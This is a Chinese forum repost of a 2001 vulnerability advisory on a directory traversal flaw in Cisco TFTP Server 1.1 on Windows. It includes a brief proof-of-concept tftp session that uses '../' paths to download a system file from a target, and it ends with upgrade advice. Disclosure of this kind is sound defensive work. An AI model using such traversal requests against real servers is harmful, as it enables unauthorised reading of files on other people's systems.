精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>网络专区>>● CISCO>>网络安全>>Cisco TFTPD Server 目录遍历漏洞[转载]

主题:Cisco TFTPD Server 目录遍历漏洞[转载]
发信人: liwhite(海阔天空)
整理人: firphoenix(2002-02-05 23:17:14), 站内信件
Cisco TFTPD Server 目录遍历漏洞 

  

发布日期: 2001-6-18 

  

更新日期: 2001-6-25 

受影响的系统: 

Cisco TFTP Server 1.1 

   - Microsoft Windows 98se 

   - Microsoft Windows 98 

   - Microsoft Windows 95 

   - Microsoft Windows NT 4.0 

  

描述: 

------------------------------------------------------------------------ 

-------- 

  

  

BUGTRAQ ID : 2886 

  

Cisco TFTP server是Cisco开发的一个tftp服务器。主要用来在微软Windows系统 

下提供 

TFTP(简单文件传输协议)服务。 

  

它的1.1版本存在一个目录遍历漏洞。攻击者可以通过tftp服务器访问系统上的任 

意文件 

。只要在文件名前面加上一些"../",就可能下载目标主机上的任意文件。 

  

<*来源: Siberian ([email protected]) *> 

  

  

测试程序: 

------------------------------------------------------------------------ 

-------- 

  

警 告 

  

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! 

  

  

  

Siberian ([email protected])提供了下列测试代码: 

  

tftp> connect target 

tftp> get ../autoexec.bat 

Recieved 218 bytes in 0.4 seconds 

tftpd> quit 

  

  

  

------------------------------------------------------------------------ 

-------- 

建议: 

  

临时解决方法: 

  

如果您正在使用有问题的版本,我们建议您立刻停止使用此版本或者升级到最新版 

本。 

  

厂商补丁: 

  

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商 

  



的主页以获取最新版本: 

http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp 


----
海阔凭鱼跃天高任鸟飞 

[关闭][返回]